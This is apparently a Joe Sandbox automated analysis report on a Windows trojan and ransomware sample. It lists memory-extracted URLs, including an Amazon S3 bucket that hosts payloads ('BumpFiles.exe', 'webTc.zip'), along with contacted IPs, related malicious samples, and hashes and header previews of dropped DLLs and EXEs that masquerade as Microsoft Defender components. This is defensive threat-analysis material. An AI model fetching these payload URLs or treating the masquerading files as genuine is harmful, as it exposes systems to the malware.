                          http://defaultcontainer/tempfiles/sample.nuspecUpdate.exe, 00000003.00000002.2050601484.00000000032FA000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2050601484.000000000341A000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		low
                          https://awsserver903203232.s3.sa-east-1.amazonaws.com/BumpFiles.exe, 00000007.00000002.3857430328.000000000341B000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            https://api.github.com/#Update.exefalse
                              		high
                              https://awsserver903203232.s3.sa-east-1.amazonaws.com/wBumpFiles.exe, 00000007.00000002.3857430328.000000000341B000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                https://awsserver903203232.s3.sa-east-1.amazonaws.com/webTc.zipQBumpFiles.exe, 00000007.00000002.3857430328.000000000341B000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  http://defaultcontainer/tempfiles/sample.exeUpdate.exe, 00000003.00000002.2050601484.00000000032FA000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2050601484.000000000341A000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		low
                                  http://www.delphiforfun.org/BumpFiles.exefalse
                                    		high
                                    https://github.com/Microsoft/cpprestsdk.ThirdPartyNotices.txt.7.drfalse
                                      		high
                                      http://defaultcontainer/_rels/.relsUpdate.exe, 00000003.00000002.2050601484.00000000032FA000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2050601484.000000000341A000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		low
                                      http://defaultcontainer/package/services/metadata/core-properties/63bdd4d7088c4a4c9e28aeaec7dfa81d.pUpdate.exe, 00000003.00000002.2050601484.0000000003433000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2050601484.000000000331C000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2050601484.00000000032FA000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2050601484.000000000341A000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		low
                                      http://defaultcontainer/tempfiles/sample.dllUpdate.exe, 00000003.00000002.2050601484.00000000032FA000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2050601484.000000000341A000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		low
                                      http://defaultcontainer/tempfiles/sample.relsUpdate.exe, 00000003.00000002.2050601484.00000000032FA000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2050601484.000000000341A000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		low
                                      https://github.com/Microsoft/cpprestsdk/blob/master/license.txt)ThirdPartyNotices.txt.7.drfalse
                                        		high
                                        http://defaultcontainer/lib/net48/BumpFiles_ExecutionStub.exeUpdate.exe, 00000003.00000002.2050601484.00000000032FA000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2050601484.000000000341A000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		low
                                        http://defaultcontainer/tempfiles/sample.shasumUpdate.exe, 00000003.00000002.2050601484.00000000032FA000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2050601484.000000000341A000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		low
                                        https://awsserver903203232.s3.sa-east-1.amazonaws.com/webTc.zipOIDBumpFiles.exe, 00000007.00000003.2064736054.0000000003456000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          http://defaultcontainer/lib/net48/BumpFiles.exeUpdate.exe, 00000003.00000002.2050601484.00000000032FA000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2050601484.000000000341A000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		low
                                          https://awsserver903203232.s3.sa-east-1.amazonaws.com/SBumpFiles.exe, 00000007.00000002.3857430328.000000000341B000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdMpCommu.dll.7.drfalse
                                              		high
                                              http://schemas.openxmlformats.orUpdate.exe, 00000003.00000002.2050601484.000000000341A000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://defaultcontainer/tempfiles/sample.psmdcpUpdate.exe, 00000003.00000002.2050601484.00000000032FA000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2050601484.000000000341A000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		low
                                              http://defaultcontainer/lib/net48/MpSvc.dllUpdate.exe, 00000003.00000002.2050601484.00000000032FA000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2050601484.000000000341A000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		low
                                              http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-username-token-profile-1.0#PasswordDigestMpCommu.dll.7.drfalse
                                                		high

                                                World Map of Contacted IPs

                                                • No. of IPs < 25%
                                                • 25% < No. of IPs < 50%
                                                • 50% < No. of IPs < 75%
                                                • 75% < No. of IPs

                                                Public IPs

                                                IPDomainCountryFlagASNASN NameMalicious
                                                3.5.232.21
                                                		s3-r-w.sa-east-1.amazonaws.comUnited States
                                                		16509AMAZON-02USfalse

                                                General Information

                                                Joe Sandbox version:40.0.0 Tourmaline
                                                Analysis ID:1397701
                                                Start date and time:2024-02-23 15:42:31 +01:00
                                                Joe Sandbox product:CloudBasic
                                                Overall analysis duration:0h 9m 5s
                                                Hypervisor based Inspection enabled:false
                                                Report type:full
                                                Cookbook file name:default.jbs
                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                Run name:Run with higher sleep bypass
                                                Number of analysed new started processes analysed:15
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:1
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Sample name:0219830219301290321012notas.exe
                                                Detection:MAL
                                                Classification:mal76.rans.troj.evad.winEXE@15/77@1/1
                                                EGA Information:
                                                • Successful, ratio: 75%
                                                HCA Information:Failed
                                                Cookbook Comments:
                                                • Found application associated with file extension: .exe
                                                • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

                                                Warnings

                                                • Exclude process from analysis (whitelisted): dllhost.exe, consent.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                • Execution Graph export aborted for target Update.exe, PID 1992 because it is empty
                                                • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                • Not all processes where analyzed, report is missing behavior information
                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                • Report size getting too big, too many NtQueryValueKey calls found.

                                                Simulations

                                                Behavior and APIs

                                                No simulations

                                                Joe Sandbox View / Context

                                                IPs

                                                No context

                                                Domains

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                s3-r-w.sa-east-1.amazonaws.com0923840932020004-3-0.exeGet hashmaliciousUnknownBrowse
                                                • 3.5.232.185
                                                WKYC506_2389030007-00901003007010_777380775_#U00b2.exeGet hashmaliciousUnknownBrowse
                                                • 52.95.163.114
                                                WKYC506_2389030007-00901003007010_777380775_#U00b2.exeGet hashmaliciousUnknownBrowse
                                                • 16.12.0.34
                                                DOC7186723912#U0370.msiGet hashmaliciousHidden Macro 4.0Browse
                                                • 52.95.164.60
                                                DOC0974045396#U0370.msiGet hashmaliciousHidden Macro 4.0Browse
                                                • 52.95.164.98
                                                file.msiGet hashmaliciousHidden Macro 4.0Browse
                                                • 52.95.164.11
                                                F#U00b498074756.msiGet hashmaliciousHidden Macro 4.0Browse
                                                • 52.95.164.122
                                                https://dismelo.com.brGet hashmaliciousUnknownBrowse
                                                • 16.12.0.2
                                                nQ6U1S5Anw.exeGet hashmaliciousUnknownBrowse
                                                • 16.12.2.46

                                                ASNs

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                AMAZON-02USSecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeGet hashmaliciousAgentTeslaBrowse
                                                • 13.234.24.116
                                                https://www.smore.com/3gtzhGet hashmaliciousUnknownBrowse
                                                • 13.225.63.24
                                                SecuriteInfo.com.Linux.Siggen.9999.30896.24770.elfGet hashmaliciousUnknownBrowse
                                                • 34.254.182.186
                                                arm7-20240223-1216.elfGet hashmaliciousMirai, MoobotBrowse
                                                • 157.175.218.236
                                                SecuriteInfo.com.Heur.30198.9129.msiGet hashmaliciousUnknownBrowse
                                                • 13.225.210.4
                                                https://qrco.de/beoXnpGet hashmaliciousHTMLPhisherBrowse
                                                • 18.238.49.52
                                                https://o365aqzkadahajmsditmwjlo-987555.webflow.io/Get hashmaliciousHTMLPhisherBrowse
                                                • 13.225.214.66
                                                343fV6LrhB.elfGet hashmaliciousMoobotBrowse
                                                • 34.249.145.219
                                                qRmUFzxtmx.elfGet hashmaliciousMoobotBrowse
                                                • 52.53.164.17

                                                JA3 Fingerprints

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                37f463bf4616ecd445d4a1937da06e19file.exeGet hashmaliciousClipboard Hijacker, RisePro StealerBrowse
                                                • 3.5.232.21
                                                7VAFdANAsr.exeGet hashmaliciousUnknownBrowse
                                                • 3.5.232.21
                                                7VAFdANAsr.exeGet hashmaliciousUnknownBrowse
                                                • 3.5.232.21
                                                file.exeGet hashmaliciousClipboard Hijacker, RisePro StealerBrowse
                                                • 3.5.232.21
                                                SecuriteInfo.com.Trojan-Banker.Win64.IcedID.er.29654.2537.msiGet hashmaliciousUnknownBrowse
                                                • 3.5.232.21
                                                SecuriteInfo.com.Win32.Trojan.PSE.11SCEUB.7077.7785.exeGet hashmaliciousUnknownBrowse
                                                • 3.5.232.21
                                                aol.com).emlGet hashmaliciousUnknownBrowse
                                                • 3.5.232.21
                                                4ZfJQ4Jtvf.exeGet hashmaliciousStealc, VidarBrowse
                                                • 3.5.232.21
                                                on.jsGet hashmaliciousUnknownBrowse
                                                • 3.5.232.21

                                                Dropped Files

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                C:\Program Files (x86)\Microsoft.NET\DefenderCSP.dll0923840932020004-3-0.exeGet hashmaliciousUnknownBrowse
                                                  WKYC506_2389030007-00901003007010_777380775_#U00b2.exeGet hashmaliciousUnknownBrowse
                                                    WKYC506_2389030007-00901003007010_777380775_#U00b2.exeGet hashmaliciousUnknownBrowse
                                                      C:\Program Files (x86)\Microsoft.NET\ConfigSecurityPolicy.exe0923840932020004-3-0.exeGet hashmaliciousUnknownBrowse
                                                        WKYC506_2389030007-00901003007010_777380775_#U00b2.exeGet hashmaliciousUnknownBrowse
                                                          WKYC506_2389030007-00901003007010_777380775_#U00b2.exeGet hashmaliciousUnknownBrowse
                                                            C:\Program Files (x86)\Microsoft.NET\AMMonitoringProvider.dll0923840932020004-3-0.exeGet hashmaliciousUnknownBrowse
                                                              WKYC506_2389030007-00901003007010_777380775_#U00b2.exeGet hashmaliciousUnknownBrowse
                                                                WKYC506_2389030007-00901003007010_777380775_#U00b2.exeGet hashmaliciousUnknownBrowse

                                                                  Created / dropped Files

                                                                  C:\Program Files (x86)\Microsoft.NET\AMMonitoringProvider.dll

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):214352
                                                                  Entropy (8bit):6.043733758501481
                                                                  Encrypted:false
                                                                  SSDEEP:3072:wC3HjG5Tg1HlnGEx6s8Pt0TOAsdPgrjnKRKisSNm50i+B5KTedUQqm1FpCShisD:wC3OTg1AExYWCA4PeTKRKiRc5MT1vh
                                                                  MD5:573FA5E140E6B7C6209B546511DD0989
                                                                  SHA1:28BEFE7EF26AE909FEB74AC4A8C9981BED192A93
                                                                  SHA-256:BA543F2CF16CB1D1CFA87D7531E6045581EE76274C36D0C9DF8C131E05B86977
                                                                  SHA-512:6E43E60743207E0C50B42BAAAF0DE71F544B579292F7907360BE0926C56C74D06CAA4E7BC0ABF5AA857400D8A573BF820905F0B9283C26EE5CD2E0E3320736BF
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  • Antivirus: Virustotal, Detection: 0%, Browse
                                                                  Joe Sandbox View:
                                                                  • Filename: 0923840932020004-3-0.exe, Detection: malicious, Browse
                                                                  • Filename: WKYC506_2389030007-00901003007010_777380775_#U00b2.exe, Detection: malicious, Browse
                                                                  • Filename: WKYC506_2389030007-00901003007010_777380775_#U00b2.exe, Detection: malicious, Browse
                                                                  Reputation:low
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... )L.dH".dH".dH"./0!.`H"./0&.pH".dH#..I"./0#.EH"./0'.nH"./0".eH"./0*.=H"./0..eH"./0 .eH".RichdH".........PE..d...u.W.........." ......... ...............................................0......9.....`A...................................................@...............x.... ..P%... ..4....Y..p....................'..(....%..@...........8'...............................text...y........................... ..`.rdata..............................@..@.data...............................@....pdata..x........ ..................@..@.rsrc...............................@..@.reloc..4.... ......................@..B........................................................................................................................................................................................................................................................................

                                                                  C:\Program Files (x86)\Microsoft.NET\AmMonitoringInstall.mof

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
                                                                  File Type:C source, ASCII text, with very long lines (769), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):9398
                                                                  Entropy (8bit):4.899071819784544
                                                                  Encrypted:false
                                                                  SSDEEP:192:0kJH/0e6Y/WnPqLO0OKcie0lmkLgJsJ+LjtU+J3I:FBf6Yyf09MnkEeAu
                                                                  MD5:1FC6F870588FEF1B38BA900026BE8828
                                                                  SHA1:6075BC55198D9A0D75A4D7DB20B7B2D8AD47A466
                                                                  SHA-256:A24DD47738189CA55A5137A49FD1246418BC1C589A4294B79DFCC4D2A79C9098
                                                                  SHA-512:530A02081ECFBAB6AB59C904874C604263975174626980BFE445371540E999754A2DD204A003D79C8F7E5FF1D5C420E2CB93BF36B527DFBF774638FE923B62D8
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  Preview:// AmMonitoringInstall.mof : mof source for Malware class..//..// Copyright (c) Microsoft Corporation. All rights reserved...//..// This file will be processed by MOFCOMP utility to..// register the provider with the WMI repository...//....#pragma autorecover....#pragma namespace ("\\\\.\\root\\Microsoft\\SecurityClient")....////////////////////////////////////////////////////////..// Declare WMI class : Malware..////////////////////////////////////////////////////////....[.. Description("Describes malware detected by Forefront Antimalware"): ToInstance ToSubClass, .. dynamic: DisableOverride ToInstance,.. provider("AntimalwareMonitoringProvider"): ToInstance ToSubClass..]..class Malware: SerializableToXml..{.. string SchemaVersion = "1.0.0.0"; // derived from SerializableToXml.. .. [.. Description("Detection time in the Round-Trip Format"): ToInstance ToSubClass, .. read: ToInstance ToSubClass.. ].. string DetectionTime;.. .. [.. Desc

                                                                  C:\Program Files (x86)\Microsoft.NET\AmStatusInstall.mof

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
                                                                  File Type:C source, ASCII text, with very long lines (769), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):21004
                                                                  Entropy (8bit):4.9286194529785705
                                                                  Encrypted:false
                                                                  SSDEEP:192:HMVlF4ajQGgTGB6r+WApyLaNFeRUTqp1CljVU2kplI5NLO060YeVwa6wplCSJddn:YD4cQGgyBV7clIi0JFMSvG4k+
                                                                  MD5:EAA6FC46125F59D04BCBB6122817B41E
                                                                  SHA1:72436F84D76486D2D1F824E6BC0D3BD47D1CB2E7
                                                                  SHA-256:67191020D74AE8400F875238E494AAF5D28EEFEC7EFE1D1D20D2DB068D5E35D6
                                                                  SHA-512:77F7DE790509CEE5D288CE9DAFB3D100E9DB8F343D5D8380E1B0EDC441D3CC0666C8ECF30DE7910FA701A54C62897ACC169F46885AEEC02B78FC1BA91FE07A80
                                                                  Malicious:false
                                                                  Preview:// AmStatusInstall.mof : mof source for Antimalware Status provider..//..// Copyright (c) Microsoft Corporation. All rights reserved...//..// This file will be processed by MOFCOMP utility to..// register the provider with the WMI repository..//....#pragma autorecover....#pragma namespace ("\\\\.\\root\\Microsoft\\SecurityClient")....////////////////////////////////////////////////////////..// Declare class : AntimalwareHealthStatus..////////////////////////////////////////////////////////..[.. provider("AntimalwareHealthStatusProv"): ToInstance ToSubClass, .. singleton: DisableOverride ToInstance ToSubClass, .. dynamic: DisableOverride ToInstance, .. Description("This is a singleton that represents the Microsoft Antimalware service status"): ToInstance ToSubClass..]..class AntimalwareHealthStatus: ProtectionTechnologyStatus..{.. string SchemaVersion = "1.0.0.1"; // derived from SerializableToXml.... string Name = "Antimalware"; // derived from ProtectionTechnologySta

                                                                  C:\Program Files (x86)\Microsoft.NET\ClientWMIInstall.mof

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
                                                                  File Type:C source, ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):2460
                                                                  Entropy (8bit):4.767342366558364
                                                                  Encrypted:false
                                                                  SSDEEP:48:FiDRPfReZei3Q9Cf9haZCX0doQkAvVTIUH9:8Db2V3Q9CFhaZCX0doXAvVTIUH9
                                                                  MD5:6FE3967E8035358D369C83FA72400006
                                                                  SHA1:A2F9F0D1667431185B3E4E74ED47EDB9CF76A2F9
                                                                  SHA-256:29EFFB537FBC7C0CF869E61BFA5262CF7A7301604298E44373A637585C3504C7
                                                                  SHA-512:0C31F1A0E111A918C763AB30EA9BF2E889BEFDE1A63AA8511F5DC11D7D3C48AA1B25F27513881E32C4E22598BA648958D67B10B7221CAF863DEFD17657A28A02
                                                                  Malicious:false
                                                                  Preview:// ClientWMIUninstall.mof : ..//..// Copyright (c) Microsoft Corporation. All rights reserved...//..// This file will be processed by MOFCOMP utility to..// install Microsoft Security Client classes to the WMI repository..//....#pragma autorecover....#pragma namespace("\\\\.\\root\\Microsoft")....instance of __Namespace..{.. Name = "SecurityClient" ;..};....#pragma namespace ("\\\\.\\root\\Microsoft\\SecurityClient")....class Win32_ProviderEx : __Win32Provider..{.. [.. Description("Hosting Model, provides compatibility with Windows XP and Windows Server .NET. Do not override."),.. Override("HostingModel").. ].. string HostingModel = "LocalServiceHost";.. .. [.. Description("..."),.. Override("SecurityDescriptor").. ] .. string SecurityDescriptor; .. .. UInt32 version = 1;..};......[.. abstract: ToInstance, .. Description("This is a base abstract class that might be serialized to XML"): ToInstance ToSubClass..]..class Seria

                                                                  C:\Program Files (x86)\Microsoft.NET\ConfigSecurityPolicy.exe

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
                                                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):296280
                                                                  Entropy (8bit):6.091659225748971
                                                                  Encrypted:false
                                                                  SSDEEP:6144:0WEUBaI5gV/c/JjDX8lv/FJlo3zMfPoL4qpBW/7DZe/pS:1VoVkhjDXS/rK4qpAFe0
                                                                  MD5:828221391F701B2CD7D1BF772A5B369E
                                                                  SHA1:E3C6679E9AA43B0A92841E36B4B2352599AA3437
                                                                  SHA-256:545F9356969C1D50E6FA0DEF359900F84553A7FDA29EDC55693CDE8B399E52BB
                                                                  SHA-512:988F7FA7A802A97C63D4AFA0D71434666179A7B73EA778332F4A77201551129F23B3C214526FA296C8B6BD688325044AFC734929E1AA94E4E58C79976F7FB14F
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  • Antivirus: Virustotal, Detection: 0%, Browse
                                                                  Joe Sandbox View:
                                                                  • Filename: 0923840932020004-3-0.exe, Detection: malicious, Browse
                                                                  • Filename: WKYC506_2389030007-00901003007010_777380775_#U00b2.exe, Detection: malicious, Browse
                                                                  • Filename: WKYC506_2389030007-00901003007010_777380775_#U00b2.exe, Detection: malicious, Browse
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........G..@...@...@.......@...C...@...D...@...E...@...A...@...A.E.@...H...@.......@...B...@.Rich..@.........................PE..d.....)..........."............................@.............................`......%-....`.......... ..........................................0.... ...#......X)...`..X%...P..\.......T.......................(...P...@............................................text............................... ..`.rdata..|...........................@..@.data...@?.......@..................@....pdata..X).......0..................@..@.rsrc....#... ...0... ..............@..@.reloc..\....P.......P..............@..B........................................................................................................................................................................................................................................................

                                                                  C:\Program Files (x86)\Microsoft.NET\DefenderCSP.dll

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):328976
                                                                  Entropy (8bit):6.198120164117354
                                                                  Encrypted:false
                                                                  SSDEEP:6144:xNnWg5R+apw+X7RUi7ugdjklyi7mjSaO8xm6j2n:rWg5R+apw+X7iSJdjklyi7mjSt8Vjm
                                                                  MD5:86C84739AE8836EDADC2631B7D59F29B
                                                                  SHA1:0370932E18368A169C1A84A3F86A305016BA6AF0
                                                                  SHA-256:7AF5A25F7991926C507FA1DDC56639E0242FCB4CBD1E4667EE660E52FE824BA6
                                                                  SHA-512:ABC7E228A1A2C2C48025F40544CF4C79FB044864DB760146886A08234F3212FFE14B7E3E3B5094FC1036444C5E9D5C3C4F28DA1B7D80822A1931BC65ED221773
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  • Antivirus: Virustotal, Detection: 0%, Browse
                                                                  Joe Sandbox View:
                                                                  • Filename: 0923840932020004-3-0.exe, Detection: malicious, Browse
                                                                  • Filename: WKYC506_2389030007-00901003007010_777380775_#U00b2.exe, Detection: malicious, Browse
                                                                  • Filename: WKYC506_2389030007-00901003007010_777380775_#U00b2.exe, Detection: malicious, Browse
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........2&..SH..SH..SH.g&I..SH.g&K..SH..+...SH.;!I..SH..SI.dRH.;!L..SH.;!K..SH.;!M.&SH.g&H..SH.g&A.SH.g&...SH.g&J..SH.Rich.SH.................PE..d......i.........." .....P...........................................................0....`A........................................`^..p....^..................8(.......%..............p......................(.......8............................................text....H.......P.................. ..`.rdata..R....`.......`..............@..@.data....0...p... ...p..............@....pdata..8(.......0..................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................

                                                                  C:\Program Files (x86)\Microsoft.NET\EppManifest.dll

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):1070440
                                                                  Entropy (8bit):5.101220702530903
                                                                  Encrypted:false
                                                                  SSDEEP:6144:JmiTVVmVVV8VVNVVVcVVVxVVVPVVlVVVRVVVtVVWV60jVLVVOVVUVZVVVVVjVVJZ:L/6qa37LS
                                                                  MD5:DD23543F34BBF0FB213A9B94EEAD88C6
                                                                  SHA1:0D86ACF88053E92C148246DBEC2ED57C5873D103
                                                                  SHA-256:11E886100FCCE403D98866CDF32A9DE5FE010DFC092B17B0A05D2598C6822CF8
                                                                  SHA-512:D87B4D7F309F2B0F6FE16803B32BCD6FD053482C705194AB0A93AB341232052AE35DEA60B34166ADB3E81F7E11685FA890AF3F8EB14C14D5159E2C30DD017E0B
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  • Antivirus: Virustotal, Detection: 0%, Browse
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..d.....E.........." ......... ...............................................0......*.....`.......................................................... ...............0..h%..............T............................................................................rdata..............................@..@.rsrc........ ....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                  C:\Program Files (x86)\Microsoft.NET\FepUnregister.mof

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
                                                                  File Type:C source, ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):361
                                                                  Entropy (8bit):4.8940836129092675
                                                                  Encrypted:false
                                                                  SSDEEP:6:j2Lx3wlgQ/B93BXVN+RytwqjOq5ceB0FVAnorAIeRKpLasaT2E/xoOEkyoMy:j2Lx3wlzBJBFN+RZqjOq5XB0GBb9RHxn
                                                                  MD5:CCE6F066104177A368EE528EBF94A170
                                                                  SHA1:25D90A5CC14763FC932A819A1120931C146E0F11
                                                                  SHA-256:58996425ADD2DFC63157CBD618ABB81C722FADCF5E2133D2488DB2840DBF47D5
                                                                  SHA-512:1E3314C5B974D97821AD5CBBC6B2D1529B598D9AD34F10AE61FEAA66625DE6ABC2267E579C59F5B1331A387EE036539C99B7256EF3A24964F5CE748D2C4D98A0
                                                                  Malicious:false
                                                                  Preview:// FepUnregister.mof : mof source for namespace unregisteration..//..// Copyright (c) Microsoft Corporation. All rights reserved...//..// This file will be processed by MOFCOMP utility to..// unregister the provider with the WMI repository..//....#pragma namespace("\\\\.\\root\\Microsoft")..#pragma deleteinstance("__Namespace.Name='SecurityClient'", nofail)..

                                                                  C:\Program Files (x86)\Microsoft.NET\MpAsDesc.dll

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):210272
                                                                  Entropy (8bit):5.230229920969571
                                                                  Encrypted:false
                                                                  SSDEEP:6144:HmiTVVmVVV8VVNVVVcVVVxVVVPVVlVVVRVVVtVVWV60jVLVVOVVUVZVVVVVjVVJQ:FOd
                                                                  MD5:566A2EA0F4DE26A845FCB86E2E1FBBDC
                                                                  SHA1:7F09E0AE96C7B6FA922EB44957AFEA88A061C765
                                                                  SHA-256:424AABA98E59CD79F308FAC5D598D165B54006A75B24ECFA0D764B825CFC3565
                                                                  SHA-512:06B480F472F933DA67FBC92F845DF4E2070D57033D4052FD4277606550D2FB1782D35784419624CCF3EE2EE69586B5C8FFA535A35DF1057C377D6FD813DFCE15
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  • Antivirus: Virustotal, Detection: 0%, Browse
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..d...T............." .................................................................h....`.......................................................... ..................`%..............T............................................................................rdata..............................@..@.rsrc........ ....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                  C:\Program Files (x86)\Microsoft.NET\MpAzSubmit.dll

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):1418512
                                                                  Entropy (8bit):6.2264061869732945
                                                                  Encrypted:false
                                                                  SSDEEP:24576:8oTyorjq8Iyuxo1Ejy4xdUzhuVStq5QYOPO0Yee55eOh1yLtVcVceu5r:8oTyore8Iy4AEjy4xdUzySC5OPOFee56
                                                                  MD5:D6D75D933B8FADA9C4016428EE8266F7
                                                                  SHA1:2E69B04D7320C590C7E4F8810F5CE5F51A7C3E2F
                                                                  SHA-256:7E2D151DB066EDFD958472D5F9B13113BEE2759306A568CA42A1FF0A3E3F4911
                                                                  SHA-512:410C487FCFF08C7052BFF30EB1CCE78DA4EDD1B3584F2A58173CA7A9B682F6BB528CFD0736F658D061F951326B609A178DD2F8C25016957EEF15A398471B34DA
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  • Antivirus: Virustotal, Detection: 0%, Browse
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......n)..*H.T*H.T*H.T.=.U+H.T.:.U9H.T*H.T.I.T.:.U9H.T.:.U.H.T.:.U.H.T.:XT(H.T.=.U+H.T.=.U.H.T.=ZT+H.T.=.U+H.TRich*H.T................PE..d.... ............" .....`... .................f.....................................s....`A.........................................r.......r.......P.......P..8........%...`...,...{..p.......................(.......8............................................text...hP.......`.................. ..`.rdata.......p... ...p..............@..@.data..............................@....pdata..8....P.......@..............@..@.rsrc........P.......@..............@..@.reloc...,...`...0...P..............@..B................................................................................................................................................................................................................................................

